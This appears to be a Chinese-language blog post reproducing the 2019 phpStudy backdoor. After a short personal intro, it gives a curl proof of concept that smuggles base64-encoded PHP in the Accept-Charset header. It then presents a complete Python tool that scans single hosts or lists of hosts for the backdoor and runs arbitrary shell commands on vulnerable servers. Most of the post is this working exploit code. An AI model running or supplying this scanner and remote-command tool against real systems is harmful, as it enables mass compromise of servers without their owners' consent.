phpstudy复现

Sep 30, 2019 00:00 · 346 words · 1 minute read poc

phpstudy复现

为什么会复现

明队给我拷了一份源码,说是审一审

熟练地打开尘封的 win,把源码一拖进去,打开一看就几个 php 文件,网站都还没有搭建起来

朋友圈就刷爆了phpstudy后门的消息,我怀疑明队在搞我

复现的时候,那个 phpstudy 的目录之前被拿来做过 XSS 持久化实验,注册过 service worker,结果谷歌和火狐浏览器疯狂弹窗,最后只好重新安装火狐

别人的poc

# Accept-Charset carries the PHP to run, base64-encoded: ZWNobyBgaXBjb25maWdgOw== decodes to
# echo `ipconfig`;  -- the request also sends Accept-Encoding: gzip,deflate, as the PoC below does.
curl http://localhost/1.php -H 'Accept-Encoding:gzip,deflate' -H 'Accept-Charset:ZWNobyBgaXBjb25maWdgOw=='

写了一下poc试试

# python test.py 127.0.0.1 手工输入地址检测
# python test.py 1.txt 批量检测txt里面的地址
# python test.py 127.0.0.1 ipconfig

import requests
import sys
import base64


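def check_phpinfo(url, *, timeout=10, session=None):
    """Probe *url* for the phpStudy backdoor by asking it to run ``phpinfo()``.

    The PHP snippet is base64-encoded into ``Accept-Charset`` and sent
    together with ``Accept-Encoding: gzip,deflate`` (the two headers the
    known PoC uses); a backdoored host answers with phpinfo output.
    Only run this against hosts you are authorized to test.

    Args:
        url: Full URL of any PHP page served by the target.
        timeout: Seconds to wait for connect/read. Without it a dead host
            stalled a whole batch run indefinitely.
        session: Optional ``requests``-compatible client (anything with a
            ``get(url, headers=, timeout=)`` method). Defaults to the
            ``requests`` module; pass a ``requests.Session`` to reuse
            connections across a batch.

    Returns:
        True when the response looks like phpinfo output, False otherwise
        (a network error is printed and counted as False, not raised).
    """
    print(url)
    payload = base64.b64encode("echo phpinfo();".encode('utf-8'))
    headers = {
        "accept-charset": str(payload, 'utf-8'),
        "Accept-Encoding": "gzip,deflate",
    }
    client = requests if session is None else session
    try:
        r = client.get(url, headers=headers, timeout=timeout)
    except requests.RequestException as exc:
        # The original bare ``except:`` also swallowed KeyboardInterrupt,
        # so a batch scan could not be aborted with Ctrl-C.
        print(f"bug: {exc}")
        return False
    # NOTE(review): "phpinfo" is a weak marker -- any page mentioning the
    # word matches; "PHP Version" would be a tighter fingerprint.
    if r.status_code == 200 and "phpinfo" in r.text:
        print(f"BackDoor:Server= {r.headers.get('Server')}")
        return True
    print("No BackDoor Exit!")
    return False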

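def batch(txt):
    """Run ``check_phpinfo`` against every target listed in file *txt*.

    One target per line; blank lines and lines starting with ``#`` are
    skipped. A line without an ``http://`` or ``https://`` scheme gets
    ``http://`` prepended.

    Args:
        txt: Path to a UTF-8 text file of hosts or URLs.
    """
    with open(txt, 'r', encoding='utf-8') as f:
        for line in f:
            # strip(), not replace('\n', ' '): the old code left a trailing
            # space on every URL it probed.
            target = line.strip()
            if not target or target.startswith('#'):
                continue
            # Prefix test rather than substring test: 'http' in
            # 'host/httpd' used to count as "has a scheme".
            if not target.startswith(('http://', 'https://')):
                target = 'http://' + target
            check_phpinfo(target)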

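def execute(url, cmd, *, timeout=10, session=None):
    """Run *cmd* on a backdoored phpStudy host and print its output.

    The command is wrapped in PHP ``system('...')``, base64-encoded and
    sent in ``Accept-Charset`` next to ``Accept-Encoding: gzip,deflate``.
    Only run this against hosts you are authorized to test.

    Args:
        url: Full URL of any PHP page served by the target.
        cmd: Shell command to execute on the target.
        timeout: Seconds to wait for connect/read.
        session: Optional ``requests``-compatible client; defaults to the
            ``requests`` module.

    Returns:
        The response body as text (it is also printed, as before).

    Raises:
        requests.RequestException: on connection or timeout failures.
    """
    # PHP single-quoted strings recognise only \' and \\ as escapes. A
    # command containing a quote or a trailing backslash (``dir C:\``)
    # used to terminate the literal early and yield a PHP parse error
    # instead of running.
    quoted = cmd.replace("\\", "\\\\").replace("'", "\\'")
    payload = base64.b64encode(f"system('{quoted}');".encode('utf-8'))
    headers = {
        "accept-charset": str(payload, 'utf-8'),
        "Accept-Encoding": "gzip,deflate",
    }
    client = requests if session is None else session
    r1 = client.get(url, headers=headers, timeout=timeout)
    print(r1.text)
    return r1.text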





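def main(argv):
    """Command-line entry point.

    Usage (matches the comment block at the top of the file)::

        python test.py <host-or-url>            probe one target
        python test.py <targets.txt>            probe every target in the file
        python test.py <host-or-url> <cmd ...>  probe, then run cmd on the target

    Args:
        argv: ``sys.argv``-style list, program name first.

    Returns:
        Exit status: 0 on completion, 2 on a usage error.
    """
    if len(argv) < 2:
        # The old script crashed with IndexError when run without arguments.
        print("usage: python test.py <host|url|targets.txt> [cmd ...]")
        return 2
    target = argv[1]
    # Batch mode: a .txt file as the only argument. Use a suffix test
    # rather than ``'txt' in arg`` so a host like txt.example.com is not
    # mistaken for a target list.
    if len(argv) == 2 and target.endswith('.txt'):
        batch(target)
        return 0
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    check_phpinfo(target)
    if len(argv) > 2:
        # Everything after the target is the command, re-joined with
        # spaces so the caller does not have to quote it.
        execute(target, ' '.join(argv[2:]))
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv))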